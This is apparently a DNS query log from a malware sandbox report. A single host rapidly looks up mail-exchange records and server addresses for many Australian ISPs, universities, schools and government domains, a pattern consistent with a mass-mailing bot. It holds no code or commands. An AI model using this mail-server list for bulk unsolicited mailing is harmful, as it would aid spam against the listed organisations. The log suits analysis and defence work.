                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.659784079 CET8.8.8.8192.168.2.30x97b6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.659784079 CET8.8.8.8192.168.2.30x97b6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.659784079 CET8.8.8.8192.168.2.30x97b6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.681680918 CET8.8.8.8192.168.2.30xc78cNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.681680918 CET8.8.8.8192.168.2.30xc78cNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.681680918 CET8.8.8.8192.168.2.30xc78cNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.681680918 CET8.8.8.8192.168.2.30xc78cNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.681680918 CET8.8.8.8192.168.2.30xc78cNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.681680918 CET8.8.8.8192.168.2.30xc78cNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.681680918 CET8.8.8.8192.168.2.30xc78cNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.681680918 CET8.8.8.8192.168.2.30xc78cNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au20.92.134.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au20.92.133.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au13.236.218.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au52.63.166.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au3.105.81.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au52.147.56.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au54.66.10.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au20.190.127.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au54.79.63.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au13.70.186.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au52.147.60.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au13.238.252.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au3.104.195.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au20.92.133.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.688193083 CET8.8.8.8192.168.2.30xd5aaNo error (0)filter2.waverl-5.mailguard.com.au20.70.88.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.722839117 CET8.8.8.8192.168.2.30x512fNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.747633934 CET8.8.8.8192.168.2.30xfd24No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.747633934 CET8.8.8.8192.168.2.30xfd24No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.810297012 CET8.8.8.8192.168.2.30x9fc4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.810297012 CET8.8.8.8192.168.2.30x9fc4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.810297012 CET8.8.8.8192.168.2.30x9fc4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.830249071 CET8.8.8.8192.168.2.30xa19fNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.830249071 CET8.8.8.8192.168.2.30xa19fNo error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.830249071 CET8.8.8.8192.168.2.30xa19fNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.830249071 CET8.8.8.8192.168.2.30xa19fNo error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.830249071 CET8.8.8.8192.168.2.30xa19fNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.830249071 CET8.8.8.8192.168.2.30xa19fNo error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.830249071 CET8.8.8.8192.168.2.30xa19fNo error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.830249071 CET8.8.8.8192.168.2.30xa19fNo error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.895175934 CET8.8.8.8192.168.2.30xc7edNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.895175934 CET8.8.8.8192.168.2.30xc7edNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.895175934 CET8.8.8.8192.168.2.30xc7edNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.926604986 CET8.8.8.8192.168.2.30x3ba2No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.926604986 CET8.8.8.8192.168.2.30x3ba2No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.926604986 CET8.8.8.8192.168.2.30x3ba2No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.926604986 CET8.8.8.8192.168.2.30x3ba2No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.926604986 CET8.8.8.8192.168.2.30x3ba2No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.926604986 CET8.8.8.8192.168.2.30x3ba2No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.926604986 CET8.8.8.8192.168.2.30x3ba2No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.926604986 CET8.8.8.8192.168.2.30x3ba2No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.002801895 CET8.8.8.8192.168.2.30xdadeNo error (0)mx1.amnet.net.au203.134.22.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.006742001 CET8.8.8.8192.168.2.30xc12No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.006742001 CET8.8.8.8192.168.2.30xc12No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.031464100 CET8.8.8.8192.168.2.30xe9e8No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.138398886 CET8.8.8.8192.168.2.30x6869No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.156476021 CET8.8.8.8192.168.2.30x69acNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.338078976 CET8.8.8.8192.168.2.30x62c6Name error (3)westwindroofing.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.342247963 CET8.8.8.8192.168.2.30x1eb7No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.360599041 CET8.8.8.8192.168.2.30x3aaeNo error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.360599041 CET8.8.8.8192.168.2.30x3aaeNo error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.360599041 CET8.8.8.8192.168.2.30x3aaeNo error (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.365724087 CET8.8.8.8192.168.2.30x727aNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.365724087 CET8.8.8.8192.168.2.30x727aNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.504206896 CET8.8.8.8192.168.2.30x269bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.504206896 CET8.8.8.8192.168.2.30x269bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.504206896 CET8.8.8.8192.168.2.30x269bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.525398016 CET8.8.8.8192.168.2.30x69b2No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.525398016 CET8.8.8.8192.168.2.30x69b2No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.525398016 CET8.8.8.8192.168.2.30x69b2No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.525398016 CET8.8.8.8192.168.2.30x69b2No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.525398016 CET8.8.8.8192.168.2.30x69b2No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.525398016 CET8.8.8.8192.168.2.30x69b2No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.525398016 CET8.8.8.8192.168.2.30x69b2No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.525398016 CET8.8.8.8192.168.2.30x69b2No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.528145075 CET8.8.8.8192.168.2.30x7fd2No error (0)student.uq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.557176113 CET8.8.8.8192.168.2.30xda17No error (0)student-uq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.557176113 CET8.8.8.8192.168.2.30xda17No error (0)student-uq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.577766895 CET8.8.8.8192.168.2.30x962dNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.598498106 CET8.8.8.8192.168.2.30x3f94No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.690862894 CET8.8.8.8192.168.2.30x4562No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.690862894 CET8.8.8.8192.168.2.30x4562No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.690862894 CET8.8.8.8192.168.2.30x4562No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.712132931 CET8.8.8.8192.168.2.30xd6a6No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.712132931 CET8.8.8.8192.168.2.30xd6a6No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.712132931 CET8.8.8.8192.168.2.30xd6a6No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.712132931 CET8.8.8.8192.168.2.30xd6a6No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.712132931 CET8.8.8.8192.168.2.30xd6a6No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.712132931 CET8.8.8.8192.168.2.30xd6a6No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.712132931 CET8.8.8.8192.168.2.30xd6a6No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.712132931 CET8.8.8.8192.168.2.30xd6a6No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.758969069 CET8.8.8.8192.168.2.30xd57No error (0)asav.tpgtelecom.com.au27.32.28.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.957202911 CET8.8.8.8192.168.2.30x75dfNo error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.957202911 CET8.8.8.8192.168.2.30x75dfNo error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.977987051 CET8.8.8.8192.168.2.30x6a9bNo error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.988425970 CET8.8.8.8192.168.2.30x2485No error (0)kilbreda.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.988425970 CET8.8.8.8192.168.2.30x2485No error (0)kilbreda.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.007392883 CET8.8.8.8192.168.2.30x7393No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.007392883 CET8.8.8.8192.168.2.30x7393No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.007392883 CET8.8.8.8192.168.2.30x7393No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.007392883 CET8.8.8.8192.168.2.30x7393No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.089834929 CET8.8.8.8192.168.2.30x85a6No error (0)netspace.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.116292000 CET8.8.8.8192.168.2.30x6be1No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.271583080 CET8.8.8.8192.168.2.30x2dc0No error (0)kulcha.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.295517921 CET8.8.8.8192.168.2.30x9496No error (0)mail.kulcha.com.au199.188.200.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.385019064 CET8.8.8.8192.168.2.30x9373No error (0)iimetro.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.409389973 CET8.8.8.8192.168.2.30xd6cfNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.411096096 CET8.8.8.8192.168.2.30x5f60No error (0)anu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.439446926 CET8.8.8.8192.168.2.30x9303No error (0)anu-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.439446926 CET8.8.8.8192.168.2.30x9303No error (0)anu-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.442440033 CET8.8.8.8192.168.2.30x7a42No error (0)australianunity.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.442440033 CET8.8.8.8192.168.2.30x7a42No error (0)australianunity.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.462996960 CET8.8.8.8192.168.2.30x6795No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.462996960 CET8.8.8.8192.168.2.30x6795No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.462996960 CET8.8.8.8192.168.2.30x6795No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.462996960 CET8.8.8.8192.168.2.30x6795No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.536426067 CET8.8.8.8192.168.2.30xb680No error (0)ci.austin.tx.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.578299046 CET8.8.8.8192.168.2.30x6a64No error (0)ci-austin-tx-us.mail.protection.outlook.com104.47.64.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.578299046 CET8.8.8.8192.168.2.30x6a64No error (0)ci-austin-tx-us.mail.protection.outlook.com104.47.65.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.579843998 CET8.8.8.8192.168.2.30x2eb9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.579843998 CET8.8.8.8192.168.2.30x2eb9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.579843998 CET8.8.8.8192.168.2.30x2eb9No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.605034113 CET8.8.8.8192.168.2.30x98ceNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.605034113 CET8.8.8.8192.168.2.30x98ceNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.605034113 CET8.8.8.8192.168.2.30x98ceNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.605034113 CET8.8.8.8192.168.2.30x98ceNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.605034113 CET8.8.8.8192.168.2.30x98ceNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.605034113 CET8.8.8.8192.168.2.30x98ceNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.605034113 CET8.8.8.8192.168.2.30x98ceNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.605034113 CET8.8.8.8192.168.2.30x98ceNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.675158978 CET8.8.8.8192.168.2.30x2cf6No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.675158978 CET8.8.8.8192.168.2.30x2cf6No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.695445061 CET8.8.8.8192.168.2.30xc619No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.752468109 CET8.8.8.8192.168.2.30x9174No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.778388977 CET8.8.8.8192.168.2.30xbafcNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.778388977 CET8.8.8.8192.168.2.30xbafcNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.849314928 CET8.8.8.8192.168.2.30xd01cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.849314928 CET8.8.8.8192.168.2.30xd01cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.849314928 CET8.8.8.8192.168.2.30xd01cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.869313955 CET8.8.8.8192.168.2.30x46eaNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.869313955 CET8.8.8.8192.168.2.30x46eaNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.869313955 CET8.8.8.8192.168.2.30x46eaNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.869313955 CET8.8.8.8192.168.2.30x46eaNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.869313955 CET8.8.8.8192.168.2.30x46eaNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.869313955 CET8.8.8.8192.168.2.30x46eaNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.869313955 CET8.8.8.8192.168.2.30x46eaNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.869313955 CET8.8.8.8192.168.2.30x46eaNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.894896984 CET8.8.8.8192.168.2.30x5374No error (0)education.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.894896984 CET8.8.8.8192.168.2.30x5374No error (0)education.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.098099947 CET8.8.8.8192.168.2.30x1a58No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.098099947 CET8.8.8.8192.168.2.30x1a58No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.098099947 CET8.8.8.8192.168.2.30x1a58No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.124005079 CET8.8.8.8192.168.2.30x4c99No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.124005079 CET8.8.8.8192.168.2.30x4c99No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.124005079 CET8.8.8.8192.168.2.30x4c99No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
